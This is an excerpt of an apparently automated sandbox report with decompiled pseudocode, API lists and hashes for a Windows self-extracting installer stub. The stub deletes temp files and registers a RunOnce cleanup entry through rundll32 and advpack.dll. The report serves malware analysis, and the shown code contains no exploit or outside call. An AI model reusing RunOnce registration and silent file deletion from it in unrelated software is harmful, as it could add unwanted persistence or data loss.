                                                                                                                                                                                                                                      0x004024b4
                                                                                                                                                                                                                                      0x004024ba
                                                                                                                                                                                                                                      0x004024c3
                                                                                                                                                                                                                                      0x004024ca
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004024ca

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(?,00408A3A,004011F4,00408A3A,00000000,?,?), ref: 004023FB
                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,004011F8), ref: 0040242C
                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(?,004011FC), ref: 00402440
                                                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(?,00000080,?), ref: 0040249A
                                                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(?), ref: 004024A8
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 004024B4
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004024C3
                                                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(00408A3A), ref: 004024CA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 836429354-0
                                                                                                                                                                                                                                      • Opcode ID: f5e9aa695cb791e9aa9293151648502b2b971a8204daf8b6ed990da5816f7404
                                                                                                                                                                                                                                      • Instruction ID: 663fedf367babcff6e9cfe528ec9bebbe05c094acf40e49189b1ee805e0fc072
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5e9aa695cb791e9aa9293151648502b2b971a8204daf8b6ed990da5816f7404
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35317231604744ABC320EF64DE8DAEB73ACABC4305F04493FB555A62D0EB7C9949875A
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                                                                                                      			E00402BF2(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                                                      				void* _t5;
                                                                                                                                                                                                                                      				void* _t6;
                                                                                                                                                                                                                                      				intOrPtr _t7;
                                                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                                                      				signed char _t19;
                                                                                                                                                                                                                                      				intOrPtr* _t21;
                                                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                                                                      				intOrPtr _t32;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t4 = GetVersion();
                                                                                                                                                                                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                      						if(_t21 != 0) {
                                                                                                                                                                                                                                      							_t17 = _t21;
                                                                                                                                                                                                                                      							 *0x40a288(0, 1, 0, 0);
                                                                                                                                                                                                                                      							 *_t21();
                                                                                                                                                                                                                                      							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                      							if(_t24 != _t24) {
                                                                                                                                                                                                                                      								_t17 = 4;
                                                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t20 = _a12;
                                                                                                                                                                                                                                      				_t18 = _a4;
                                                                                                                                                                                                                                      				 *0x409124 = 0; // executed
                                                                                                                                                                                                                                      				_t5 = E00402CA1(_a4, _a12, _t29, _t17); // executed
                                                                                                                                                                                                                                      				if(_t5 != 0) {
                                                                                                                                                                                                                                      					_t9 = E00402F10(_t18, _t20); // executed
                                                                                                                                                                                                                                      					_t22 = _t9; // executed
                                                                                                                                                                                                                                      					E00405276(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                      					if(_t22 != 0) {
                                                                                                                                                                                                                                      						_t32 =  *0x408a3a; // 0x0
                                                                                                                                                                                                                                      						if(_t32 == 0) {
                                                                                                                                                                                                                                      							_t19 =  *0x409a2c; // 0x0
                                                                                                                                                                                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                      								E00401F9B(_t19, _t21, _t22);
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t6 =  *0x408588; // 0x0
                                                                                                                                                                                                                                      				if(_t6 != 0) {
                                                                                                                                                                                                                                      					CloseHandle(_t6);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t7 =  *0x409124; // 0x0
                                                                                                                                                                                                                                      				return _t7;
                                                                                                                                                                                                                                      			}



















                                                                                                                                                                                                                                      0x00402bfa
                                                                                                                                                                                                                                      0x00402c04
                                                                                                                                                                                                                                      0x00402c0f
                                                                                                                                                                                                                                      0x00402c17
                                                                                                                                                                                                                                      0x00402c25
                                                                                                                                                                                                                                      0x00402c29
                                                                                                                                                                                                                                      0x00402c2d
                                                                                                                                                                                                                                      0x00402c34
                                                                                                                                                                                                                                      0x00402c3a
                                                                                                                                                                                                                                      0x00402c3c
                                                                                                                                                                                                                                      0x00402c3e
                                                                                                                                                                                                                                      0x00402c40
                                                                                                                                                                                                                                      0x00402c45
                                                                                                                                                                                                                                      0x00402c45
                                                                                                                                                                                                                                      0x00402c3e
                                                                                                                                                                                                                                      0x00402c29
                                                                                                                                                                                                                                      0x00402c17
                                                                                                                                                                                                                                      0x00402c47
                                                                                                                                                                                                                                      0x00402c4b
                                                                                                                                                                                                                                      0x00402c4e
                                                                                                                                                                                                                                      0x00402c54
                                                                                                                                                                                                                                      0x00402c5b
                                                                                                                                                                                                                                      0x00402c5d
                                                                                                                                                                                                                                      0x00402c62
                                                                                                                                                                                                                                      0x00402c64
                                                                                                                                                                                                                                      0x00402c6b
                                                                                                                                                                                                                                      0x00402c6d
                                                                                                                                                                                                                                      0x00402c73
                                                                                                                                                                                                                                      0x00402c75
                                                                                                                                                                                                                                      0x00402c7e
                                                                                                                                                                                                                                      0x00402c80
                                                                                                                                                                                                                                      0x00402c80
                                                                                                                                                                                                                                      0x00402c7e
                                                                                                                                                                                                                                      0x00402c73
                                                                                                                                                                                                                                      0x00402c6b
                                                                                                                                                                                                                                      0x00402c85
                                                                                                                                                                                                                                      0x00402c8c
                                                                                                                                                                                                                                      0x00402c8f
                                                                                                                                                                                                                                      0x00402c8f
                                                                                                                                                                                                                                      0x00402c95
                                                                                                                                                                                                                                      0x00402c9e

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,00406B50,00400000,00000000,00000002,0000000A), ref: 00402BFA
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00406B50,00400000,00000000,00000002,0000000A), ref: 00402C0F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00402C1F
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00406B50,00400000,00000000,00000002,0000000A), ref: 00402C8F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                      • Opcode ID: deb5c290ac125339a1861f2ec0aa9d8e971a66f44e43d2c64f3fca3d639e2a8a
                                                                                                                                                                                                                                      • Instruction ID: 0c45a7f77a7cd989f704ee4a2353c1ede117384d53434ee6547757b882282eb9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: deb5c290ac125339a1861f2ec0aa9d8e971a66f44e43d2c64f3fca3d639e2a8a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0211CE712047055BF7146BA5AF8CA2F37599B88398B05403AB942B73E1DAB8CC04866D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                                                      			E00402033(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                                                      				void* _v532;
                                                                                                                                                                                                                                      				int _v536;
                                                                                                                                                                                                                                      				int _v540;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                                                      				long _t36;
                                                                                                                                                                                                                                      				long _t41;
                                                                                                                                                                                                                                      				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                      				intOrPtr _t49;
                                                                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                                                      				void _t56;
                                                                                                                                                                                                                                      				signed int _t66;
                                                                                                                                                                                                                                      				intOrPtr* _t72;
                                                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                                                      				intOrPtr* _t81;
                                                                                                                                                                                                                                      				void* _t86;
                                                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                                                      				void* _t90;
                                                                                                                                                                                                                                      				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                      				signed int _t93;
                                                                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t79 = __edx;
                                                                                                                                                                                                                                      				_t28 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                      				_t84 = 0x104;
                                                                                                                                                                                                                                      				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                      				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                      				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                      				_t66 = 0;
                                                                                                                                                                                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                                                      					L24:
                                                                                                                                                                                                                                      					return E00406C80(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_push(_t86);
                                                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                      					E0040173E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                      					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                      					if(_t41 != 0) {
                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t87 = _t87 + 1;
                                                                                                                                                                                                                                      					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					break;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                      					_t79 = _t84;
                                                                                                                                                                                                                                      					E00406534( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                      					_t84 = _t46;
                                                                                                                                                                                                                                      					if(_t84 == 0) {
                                                                                                                                                                                                                                      						L10:
                                                                                                                                                                                                                                      						if(GetModuleFileNameA( *0x409a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                      							L17:
                                                                                                                                                                                                                                      							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                                                      							_pop(_t86);
                                                                                                                                                                                                                                      							goto L24;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                                                      						_t72 =  &_v268;
                                                                                                                                                                                                                                      						_t80 = _t72 + 1;
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_t49 =  *_t72;
                                                                                                                                                                                                                                      							_t72 = _t72 + 1;
                                                                                                                                                                                                                                      						} while (_t49 != 0);
                                                                                                                                                                                                                                      						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                      						_t81 = 0x4091e4;
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_t50 =  *_t81;
                                                                                                                                                                                                                                      							_t81 = _t81 + 1;
                                                                                                                                                                                                                                      						} while (_t50 != 0);
                                                                                                                                                                                                                                      						_t84 = _t73 + 0x50 + _t81 - 0x4091e5;
                                                                                                                                                                                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x4091e5);
                                                                                                                                                                                                                                      						if(_t90 != 0) {
                                                                                                                                                                                                                                      							 *0x408580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                                                      								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_push("C:\Users\Arthur\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                      							E0040173E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                      							_t75 = _t90;
                                                                                                                                                                                                                                      							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                      							_t79 = _t23;
                                                                                                                                                                                                                                      							do {
                                                                                                                                                                                                                                      								_t56 =  *_t75;
                                                                                                                                                                                                                                      								_t75 = _t75 + 1;
                                                                                                                                                                                                                                      							} while (_t56 != 0);
                                                                                                                                                                                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                      							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                      							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                      							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t79 = 0x4b5;
                                                                                                                                                                                                                                      						E00404495(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                      					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                      					if(_t91 == 0) {
                                                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                      						E00406534( &_v268, 0x104, 0x401140);
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                      				 *0x408530 = _t66;
                                                                                                                                                                                                                                      				goto L23;
                                                                                                                                                                                                                                      			}

































                                                                                                                                                                                                                                      0x00402033
                                                                                                                                                                                                                                      0x0040203e
                                                                                                                                                                                                                                      0x00402045
                                                                                                                                                                                                                                      0x0040204a
                                                                                                                                                                                                                                      0x00402059
                                                                                                                                                                                                                                      0x00402068
                                                                                                                                                                                                                                      0x0040206d
                                                                                                                                                                                                                                      0x00402078
                                                                                                                                                                                                                                      0x00402095
                                                                                                                                                                                                                                      0x0040209d
                                                                                                                                                                                                                                      0x00402260
                                                                                                                                                                                                                                      0x0040226d
                                                                                                                                                                                                                                      0x0040226d
                                                                                                                                                                                                                                      0x004020a3
                                                                                                                                                                                                                                      0x004020a4
                                                                                                                                                                                                                                      0x004020a6
                                                                                                                                                                                                                                      0x004020b3
                                                                                                                                                                                                                                      0x004020b8
                                                                                                                                                                                                                                      0x004020d2
                                                                                                                                                                                                                                      0x004020da
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004020dc
                                                                                                                                                                                                                                      0x004020e3
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004020e3
                                                                                                                                                                                                                                      0x004020eb
                                                                                                                                                                                                                                      0x0040210c
                                                                                                                                                                                                                                      0x00402117
                                                                                                                                                                                                                                      0x0040211f
                                                                                                                                                                                                                                      0x0040212b
                                                                                                                                                                                                                                      0x00402131
                                                                                                                                                                                                                                      0x00402135
                                                                                                                                                                                                                                      0x00402182
                                                                                                                                                                                                                                      0x0040219d
                                                                                                                                                                                                                                      0x004021e7
                                                                                                                                                                                                                                      0x004021ed
                                                                                                                                                                                                                                      0x0040225f
                                                                                                                                                                                                                                      0x0040225f
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040225f
                                                                                                                                                                                                                                      0x0040219f
                                                                                                                                                                                                                                      0x0040219f
                                                                                                                                                                                                                                      0x004021a5
                                                                                                                                                                                                                                      0x004021a8
                                                                                                                                                                                                                                      0x004021a8
                                                                                                                                                                                                                                      0x004021aa
                                                                                                                                                                                                                                      0x004021ab
                                                                                                                                                                                                                                      0x004021af
                                                                                                                                                                                                                                      0x004021b1
                                                                                                                                                                                                                                      0x004021b9
                                                                                                                                                                                                                                      0x004021b9
                                                                                                                                                                                                                                      0x004021bb
                                                                                                                                                                                                                                      0x004021bc
                                                                                                                                                                                                                                      0x004021c5
                                                                                                                                                                                                                                      0x004021d0
                                                                                                                                                                                                                                      0x004021d4
                                                                                                                                                                                                                                      0x004021fa
                                                                                                                                                                                                                                      0x004021ff
                                                                                                                                                                                                                                      0x00402206
                                                                                                                                                                                                                                      0x00402208
                                                                                                                                                                                                                                      0x00402208
                                                                                                                                                                                                                                      0x0040220d
                                                                                                                                                                                                                                      0x0040221c
                                                                                                                                                                                                                                      0x00402221
                                                                                                                                                                                                                                      0x00402226
                                                                                                                                                                                                                                      0x00402226
                                                                                                                                                                                                                                      0x00402229
                                                                                                                                                                                                                                      0x00402229
                                                                                                                                                                                                                                      0x0040222b
                                                                                                                                                                                                                                      0x0040222c
                                                                                                                                                                                                                                      0x00402232
                                                                                                                                                                                                                                      0x00402246
                                                                                                                                                                                                                                      0x00402252
                                                                                                                                                                                                                                      0x00402259
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00402259
                                                                                                                                                                                                                                      0x004021db
                                                                                                                                                                                                                                      0x004021e2
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004021e2
                                                                                                                                                                                                                                      0x00402143
                                                                                                                                                                                                                                      0x0040214a
                                                                                                                                                                                                                                      0x0040214d
                                                                                                                                                                                                                                      0x00402155
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040216c
                                                                                                                                                                                                                                      0x0040217b
                                                                                                                                                                                                                                      0x0040217b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040216c
                                                                                                                                                                                                                                      0x004020f3
                                                                                                                                                                                                                                      0x004020f9
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402059
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402068
                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00402095
                                                                                                                                                                                                                                        • Part of subcall function 0040173E: _vsnprintf.MSVCRT ref: 00401770
                                                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004020D2
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004020F3
                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040210C
                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0040212B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 0040213D
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0040214D
                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402164
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402195
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004021CA
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004021ED
                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00402246
                                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402252
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00402259
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                      • API String ID: 178549006-1171619124
                                                                                                                                                                                                                                      • Opcode ID: 626b5646bfa3c3251d2e03baa12699cf9c117681d45d3ee875c91a119e90883f
                                                                                                                                                                                                                                      • Instruction ID: 7902cad0dd60a6b70c0cc778a3dc954ca61c69f255f580049b2e388ba5fcc4b8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 626b5646bfa3c3251d2e03baa12699cf9c117681d45d3ee875c91a119e90883f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74512671A00218BBDB209F60DE4DFEB776CEF54700F1041BAFA45F62D1DAB89E458A58
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 232 40555a-405593 call 404669 LocalAlloc 235 405595-4055ab call 404495 call 406233 232->235 236 4055b7-4055c6 call 404669 232->236 248 4055b0-4055b2 235->248 242 4055c8-4055ea call 404495 LocalFree 236->242 243 4055ec-4055fd lstrcmpA 236->243 242->248 246 405605-405613 LocalFree 243->246 247 4055ff 243->247 250 405650-405656 246->250 251 405615-405617 246->251 247->246 254 405871-40587f call 406c80 248->254 255 405859-40586f call 4064c3 250->255 256 40565c-405662 250->256 252 405623 251->252 253 405619-405621 251->253 257 405625-405634 call 405423 252->257 253->252 253->257 255->254 256->255 260 405668-40567b GetTempPathA 256->260 269 405855-405857 257->269 270 40563a-40564b call 404495 257->270 264 4056ad-4056cb call 4017a1 260->264 265 40567d-405683 call 405423 260->265 274 4056d1-4056e3 GetDriveTypeA 264->274 275 405826-40584a GetWindowsDirectoryA call 405933 264->275 272 405688-40568a 265->272 269->254 270->248 272->269 276 405690-405699 call 402631 272->276 278 4056e5-4056e8 274->278 279 4056ea-4056fa GetFileAttributesA 274->279 275->264 286 405850 275->286 276->264 287 40569b-4056a7 call 405423 276->287 278->279 284 4056fc-4056ff 278->284 279->284 285 405738-405749 call 405933 279->285 289 405701-405709 284->289 290 405725 284->290 297 40574b-405758 call 402631 285->297 298 40576c-405779 call 402631 285->298 286->269 287->264 287->269 292 40572b-405733 289->292 294 40570b-40570d 289->294 290->292 296 40581e-405820 292->296 294->292 299 40570f-40571c call 4068fc 294->299 296->274 296->275 297->290 307 40575a-40576a call 405933 297->307 308 40577b-405787 GetWindowsDirectoryA 298->308 309 40578d-4057b2 call 406534 GetFileAttributesA 298->309 299->290 306 40571e-405723 299->306 306->285 306->290 307->290 307->298 308->309 314 4057c4 309->314 315 4057b4-4057c2 CreateDirectoryA 309->315 316 4057c7-4057c9 314->316 315->316 317 4057e1-405816 SetFileAttributesA call 4017a1 call 405423 316->317 318 4057cb-4057df 316->318 317->269 323 405818 317->323 318->296 323->296
                                                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                                                      			E0040555A(void* __eflags) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v265;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                                                      				int _t32;
                                                                                                                                                                                                                                      				int _t33;
                                                                                                                                                                                                                                      				int _t35;
                                                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                                                      				int _t40;
                                                                                                                                                                                                                                      				int _t44;
                                                                                                                                                                                                                                      				long _t48;
                                                                                                                                                                                                                                      				int _t49;
